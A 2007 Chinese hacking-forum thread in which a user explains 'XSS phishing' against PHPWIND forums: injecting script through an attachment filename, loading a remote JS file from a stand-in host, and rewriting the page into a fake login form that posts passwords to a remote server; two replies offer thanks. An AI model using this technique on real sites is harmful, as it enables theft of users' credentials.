注册
登录
论坛
搜索
社区银行
帮助
导航
私人消息 (0)
公共消息 (0)
系统消息 (0)
好友消息 (0)
帖子消息 (0)
黑色海岸线论坛
»
网络安全
» XSS Phishing - 新式跨站脚本攻击方式
返回列表
发帖
发短消息
加为好友
寂寞hacker
当前离线
帖子
55
我的爱好
阅读权限
10
来自
云南(昆明)
在线时间
10 小时
黑海舰队列兵
主题
0
积分
0
贝壳
0 个
性别
男
来自
云南(昆明)
注册时间
2007-6-26
最后登录
2008-5-14
楼主
跳转到
»
倒序看帖
打印
字体大小:
t
T
寂寞hacker
发表于 2007-7-23 09:08
|
只看该作者
[分享]
XSS Phishing - 新式跨站脚本攻击方式
最近跨站脚本漏洞好像比较火,国内的一些比较出名的WEB程序都陆续暴出了跨站脚本漏洞,但是一提到跨站脚本漏洞的攻击方式大家都哑火了,因为在常规的概念中这种漏洞最多是挂网页木马,获取COOKIE之类,属于典型的鸡肋漏洞!
跨站脚本攻击最大的魅力是通过HTML注入劫持用户的浏览器,任意构造用户当前浏览的HTML内容,甚至可以模拟用户当前的操作。我这里介绍一种新式攻击方法:XSS Phishing(跨站脚本钓鱼攻击),利用这种方式可以直接盗取用户的密码,下面我就拿最近PHPWIND论坛所暴出的XSS做一下演示,PHPWIND对上传文件名没有处理严格,导致可以写入跨站脚本。
先做一个简单的测试,发一篇新帖,在附件中随意写入一个本地路径加带“”的文件名,如图一
javascript:if(this.width>500)this.width=500" border=0>
发帖成功后我们会发现,帖子附件名已经没有了,如图二
javascript:if(this.width>500)this.width=500" border=0>
我们查看当前页面的源代码会发现已经写到页面内,如图三
javascript:if(this.width>500)this.width=500" border=0>
当然要写入脚本,PHPWIND还是做了限制,文件名中出现"(","/"字符将会被过滤,不过可以利用HTML转码的方式绕过这个限制,如转换成
这样我们已经实现了跨站脚本的写入,关键是怎么实现攻击,这一处跨站脚本漏洞进行了HTML转码,我们不方便写入过长的内容,那么就加载一个JS文件,动态创建一个script标记,代码如下:
http://xxx.com/xss.js
";document.body.appendChild(s);>
OK,到了这一步我们就可以在JS中任意构造我们的攻击代码,攻击的思路是当用户访问帖子,利用脚本清空当前页面,然后重新写成钓鱼页面。
首先我们可以实验一下,javacript有一个小特性,延时输出将会清空当前页面所有的内容,代码如下:
function Phish(){
info = "我是来钓鱼的!"
document.write(info);
}
function doit(){
setTimeout("Phish()", 1000 );
}doit()
如图四,帖子页面的代码和内容全变成了“我是来钓鱼的!”
javascript:if(this.width>500)this.width=500" border=0>
想一想,如果我们把info变量的内容变成HTML代码会怎样,如图五
javascript:if(this.width>500)this.width=500" border=0>
嘿嘿,邪恶一点!我们完全可以把页面变成一个自己操纵的登录页面,将表单的值指向远程服务器上的程序,如图六
javascript:if(this.width>500)this.width=500" border=0>
然后远程服务器上的程序将接受表单POST的用户和密码,当然我们可以做巧妙点,让其访问后又转跳回论坛首页,代码如下:
javascript:if(this.width>500)this.width=500" border=0>
最后我们便完成了钓鱼的过程,管理员访问我们的帖子,马上重写当前页面,设置一个重新登录的陷阱,盗取用户名和密码,全部过程只在没有察觉的一瞬间.
这类攻击方式危害很大,文中的原始代码只是描叙一下思路,有很多破绽,当然如果你够邪恶的话,完全可以自己重写代码,钓鱼于无形之中。
提醒一下,跨站脚本不仅仅是简单的挂马,XSS Phishing(跨站脚本钓鱼攻击)只是一个简单的开始!
有关XSS跨站攻击的基本概念及防范的方法,请读者参考以下文章:
浅析XSS(Cross Site Script)漏洞原理
http://publish.it168.com/2007/0704/20070704004201.shtml
收藏
分享
給自己一個晚上,沒有愛又能怎樣,我不是你的天使,我不懂你的天堂!☆╬═→ China Isbase
发短消息
加为好友
默读忧伤
(co2co)
当前离线
笨鸟先飞
帖子
6561
我的爱好
阅读权限
20
来自
火星
在线时间
63 小时
黑海舰队少尉
主题
0
积分
46
贝壳
46 个
性别
男
来自
火星
注册时间
2003-5-7
最后登录
2008-11-7
沙发
默读忧伤
发表于 2007-7-23 13:56
|
只看该作者
有意思有意思~
谢谢分享~
我的博客小站
TOP
发短消息
加为好友
adman
当前离线
Admin
帖子
2030
我的爱好
阅读权限
10
来自
黑色海岸线
在线时间
94 小时
黑海舰队列兵
主题
0
积分
7
贝壳
7 个
来自
黑色海岸线
注册时间
2006-11-27
最后登录
2011-2-10
板凳
adman
发表于 2007-7-23 20:33
|
只看该作者
頂!反正我不懂!哈哈!!
TOP
返回列表
回复
发帖
使用交流
网络安全
网络技术
娱乐休闲
灌水乐园
文学天地
美图欣赏
网站办公
站务处理
[收藏此主题]
[关注此主题的新回复]
[通过 QQ、MSN 分享给朋友]